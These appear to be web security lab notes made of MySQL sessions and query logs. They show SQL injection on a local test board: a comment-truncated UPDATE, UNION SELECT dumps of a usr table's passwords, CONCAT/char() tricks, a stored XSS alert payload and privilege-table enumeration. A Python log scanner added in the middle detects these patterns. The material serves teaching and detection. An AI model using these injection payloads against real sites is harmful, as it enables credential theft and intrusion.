[ESPC3] Web Security 0x0A
382 magic_quotes_gpc = Off
tail -f /usr/local/mysql/data/query.log
29 Query update zetyx_board_test set download1=download1, memo=\'AAAA\' where no=\'9\' /*=download1=download1, memo=\'AAAA\' where no=\'9\' /*+1 where no=''
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 30 to server version: 4.0.20-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+----------+
| Database |
+----------+
| Jack2    |
| mysql    |
| test     |
| zboard   |
| zboard2  |
+----------+
5 rows in set (0.00 sec)
mysql> use Jack2;
Database changed
mysql> desc news;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id    | int(11)     | YES  |     | NULL    |       |
| title | varchar(20) | YES  |     | NULL    |       |
| News  | varchar(50) | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
+----------+
| char(65) |
+----------+
| A        |
+----------+
1 row in set (0.00 sec)
mysql> select char(65),char(97);
+----------+----------+
| char(65) | char(97) |
+----------+----------+
| A        | a        |
+----------+----------+
1 row in set (0.00 sec)
+-----------------------+
| CONCAT('1234','5678') |
+-----------------------+
| 12345678              |
+-----------------------+
1 row in set (0.00 sec)
+----------------------------+
| CONCAT('1234',0x2f,'5678') |
+----------------------------+
| 1234/5678                  |
+----------------------------+
1 row in set (0.00 sec)
+------------------+
| CONCAT(id,title) |
+------------------+
| 1Test1           |
+------------------+
1 row in set (0.00 sec)
+------------------------------------+
| CONCAT(char(65),char(66),char(67)) |
+------------------------------------+
| ABC                                |
+------------------------------------+
1 row in set (0.00 sec)
+-------------------------------+
| memo                          |
+-------------------------------+
| <SCRIPT>alert("XSS")</SCRIPT> |
+-------------------------------+
1 row in set (0.00 sec)
/home/test/public_html/jack2
[root@localhost jack2]# vi view.php
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id    | int(11)     | YES  |     | NULL    |       |
| user  | varchar(20) | YES  |     | NULL    |       |
| pwd   | varchar(20) | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
mysql> INSERT INTO usr (id, user, pwd) VALUES (1,'admin','secret');
Query OK, 1 row affected (0.00 sec)
mysql> INSERT INTO usr (id, user, pwd) VALUES (2,'ad','1234');
Query OK, 1 row affected (0.00 sec)
mysql> INSERT INTO usr (id, user, pwd) VALUES (3,'test','test');
Query OK, 1 row affected (0.00 sec)
+------+-------+--------+
| id   | user  | pwd    |
+------+-------+--------+
|    1 | admin | secret |
|    2 | ad    | 1234   |
|    3 | test  | test   |
+------+-------+--------+
3 rows in set (0.00 sec)
tail -f /usr/local/mysql/data/query.log
120122 0:18:53 63 Query desc news
120122 0:20:17 63 Query CREATE usr (id INT(11), user varchar(20), pwd varchar(20))
120122 0:20:41 63 Query CREATE table usr (id INT(11),user varchar(20), pwd varchar(20))
120122 0:21:02 63 Query desc usr
120122 0:22:02 63 Query INSERT INTO usr (id, user, pwd) VALUES (1,'admin','secret')
120122 0:22:14 63 Query INSERT INTO usr (id, user, pwd) VALUES (2,'ad','1234')
120122 0:22:23 63 Query INSERT INTO usr (id, user, pwd) VALUES (3,'test','test')
120122 0:23:01 63 Query SELECT * FROM usr
120122 0:23:05 63 Query SELECT * FROM usr
120122 0:24:27 63 Quit
120122 0:24:32 64 Connect root@localhost on
64 Init DB Jack2
64 Query SELECT * FROM news WHERE id=1
64 Quit
65 Init DB Jack2
65 Query SELECT * FROM news WHERE id=1 union SELECT * FROM usr
65 Quit
+------+-------+---------+
| id   | title | News    |
+------+-------+---------+
|    1 | Test1 | Restart |
|    1 | admin | secret  |
|    2 | ad    | 1234    |
|    3 | test  | test    |
+------+-------+---------+
4 rows in set (0.00 sec)
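An added defender-side example, not from the original notes: a small Python scanner over general query log lines in the format shown above. It flags the three things this lab exercises, an appended UNION SELECT, an unclosed /* comment that discards the rest of the original statement, and char()/CONCAT() with hex literals used to build strings without quote characters. The log text, regexes and function names are my own constructions based on the entries recorded here.

```python
import re

# Constructed sample in the MySQL 4.0 general query log format shown above: only the
# first entry in a given second carries the date/time, the rest start with the connection id.
SAMPLE_LOG = r"""
120122  0:24:32      64 Connect     root@localhost on
                     64 Init DB     Jack2
                     64 Query       SELECT * FROM news WHERE id=1
                     64 Quit
                     65 Init DB     Jack2
                     65 Query       SELECT * FROM news WHERE id=1 union SELECT * FROM usr
                     65 Quit
120122  0:31:10      29 Query       update zetyx_board_test set download1=download1, memo=\'AAAA\' where no=\'9\' /*+1 where no=''
                     66 Query       SELECT CONCAT(id,char(0x2f),title) FROM news WHERE id=1
"""

# The timestamp is optional so continuation lines are parsed too; only Query entries matter.
LINE_RE = re.compile(r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+Query\s+(.*)$")

INDICATORS = [
    # a second SELECT glued onto the original statement
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    # an opening comment with no close: the rest of the original SQL is discarded
    ("comment_truncation", re.compile(r"/\*[^*]*$|--\s")),
    # char()/CONCAT() with hex literals builds strings without quote characters
    ("quoteless_string", re.compile(r"\bchar\s*\(|\bconcat\s*\(.*0x[0-9a-f]+", re.I)),
]

def parse_queries(log_text):
    """Return [(connection_id, sql)] for every Query entry in the log text."""
    queries = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            queries.append((int(m.group(1)), m.group(2).strip()))
    return queries

def find_suspicious(log_text):
    """Return [(connection_id, [indicator names], sql)] for queries matching any indicator."""
    hits = []
    for conn_id, sql in parse_queries(log_text):
        names = [name for name, rx in INDICATORS if rx.search(sql)]
        if names:
            hits.append((conn_id, names, sql))
    return hits

if __name__ == "__main__":
    for conn_id, names, sql in find_suspicious(SAMPLE_LOG):
        print(f"conn {conn_id}: {', '.join(names)}: {sql}")
```

Run it against a real query log with tail -f piped in, or adapt LINE_RE for the newer log format; the indicator list is deliberately narrow to keep false positives low on ordinary application SQL.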
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id    | int(11)     | YES  |     | NULL    |       |
| user  | varchar(20) | YES  |     | NULL    |       |
| pwd   | varchar(20) | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
mysql> desc news;
+-------+-------------+------+-----+---------+-------+
| Field | Type        | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id    | int(11)     | YES  |     | NULL    |       |
| title | varchar(20) | YES  |     | NULL    |       |
| News  | varchar(50) | YES  |     | NULL    |       |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM fnews;
+------+------+-----------+----------------------+
| id   | pri  | title     | News                 |
+------+------+-----------+----------------------+
|    1 |    0 | test news | It is a Testing News |
+------+------+-----------+----------------------+
1 row in set (0.00 sec)
ERROR 1222: The used SELECT statements have a different number of columns
-> title VARCHAR(20), News VARCHAR(20)
-> );
Query OK, 0 rows affected (0.01 sec)
mysql> INSERT INTO Anews (title,News) VALUES ('Test', 'It is the testing news');
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM Anews;
+-------+----------------------+
| title | News                 |
+-------+----------------------+
| Test  | It is the testing ne |
+-------+----------------------+
1 row in set (0.00 sec)
ERROR 1222: The used SELECT statements have a different number of columns
+-------+----------------------+
| title | News                 |
+-------+----------------------+
| Test  | It is the testing ne |
| 1     | admin/secret         |
| 2     | ad/1234              |
| 3     | test/test            |
+-------+----------------------+
4 rows in set (0.01 sec)
+------+------+-----------+----------------------+
| id   | pri  | title     | News                 |
+------+------+-----------+----------------------+
|    1 |    0 | test news | It is a Testing News |
|    1 |    0 | secret    | NULL                 |
|    2 |    0 | 1234      | NULL                 |
|    3 |    0 | test      | NULL                 |
+------+------+-----------+----------------------+
4 rows in set (0.00 sec)
+------+------+-----------+----------------------+
| id   | pri  | title     | News                 |
+------+------+-----------+----------------------+
|    1 |    0 | test news | It is a Testing News |
|    1 | NULL | admin     | secret               |
|    2 | NULL | ad        | 1234                 |
|    3 | NULL | test      | test                 |
+------+------+-----------+----------------------+
4 rows in set (0.00 sec)
+------+------+-----------+----------------------+
| id   | pri  | title     | News                 |
+------+------+-----------+----------------------+
|    1 |    0 | test news | It is a Testing News |
| NULL | NULL | NULL      | NULL                 |
+------+------+-----------+----------------------+
2 rows in set (0.00 sec)
mysql> SELECT * FROM fnews UNION SELECT 1,2,3,4 FROM usr;
+------+------+-----------+----------------------+
| id   | pri  | title     | News                 |
+------+------+-----------+----------------------+
|    1 |    0 | test news | It is a Testing News |
|    1 |    2 | 3         | 4                    |
+------+------+-----------+----------------------+
2 rows in set (0.00 sec)
Database changed
mysql> SELECT host,user , Select_priv FROM user;
+-----------------------+------+-------------+
| host                  | user | Select_priv |
+-----------------------+------+-------------+
| localhost             | root | Y           |
| localhost.localdomain | root | Y           |
| localhost             |      | N           |
| localhost.localdomain |      | N           |
+-----------------------+------+-------------+
4 rows in set (0.00 sec)
+-----------------------+-----------------+------+-----+---------+-------+
| Field                 | Type            | Null | Key | Default | Extra |
+-----------------------+-----------------+------+-----+---------+-------+
| Host                  | char(60) binary |      | PRI |         |       |
| Db                    | char(64) binary |      | PRI |         |       |
| User                  | char(16) binary |      | PRI |         |       |
| Select_priv           | enum('N','Y')   |      |     | N       |       |
| Insert_priv           | enum('N','Y')   |      |     | N       |       |
| Update_priv           | enum('N','Y')   |      |     | N       |       |
| Delete_priv           | enum('N','Y')   |      |     | N       |       |
| Create_priv           | enum('N','Y')   |      |     | N       |       |
| Drop_priv             | enum('N','Y')   |      |     | N       |       |
| Grant_priv            | enum('N','Y')   |      |     | N       |       |
| References_priv       | enum('N','Y')   |      |     | N       |       |
| Index_priv            | enum('N','Y')   |      |     | N       |       |
| Alter_priv            | enum('N','Y')   |      |     | N       |       |
| Create_tmp_table_priv | enum('N','Y')   |      |     | N       |       |
| Lock_tables_priv      | enum('N','Y')   |      |     | N       |       |
+-----------------------+-----------------+------+-----+---------+-------+
15 rows in set (0.00 sec)
+---------+------+-------------+
| DB      | User | Select_priv |
+---------+------+-------------+
| test    |      | Y           |
| test\_% |      | Y           |
+---------+------+-------------+
2 rows in set (0.00 sec)
=> Checking this table shows whether a given user has or lacks access privileges for the database in question.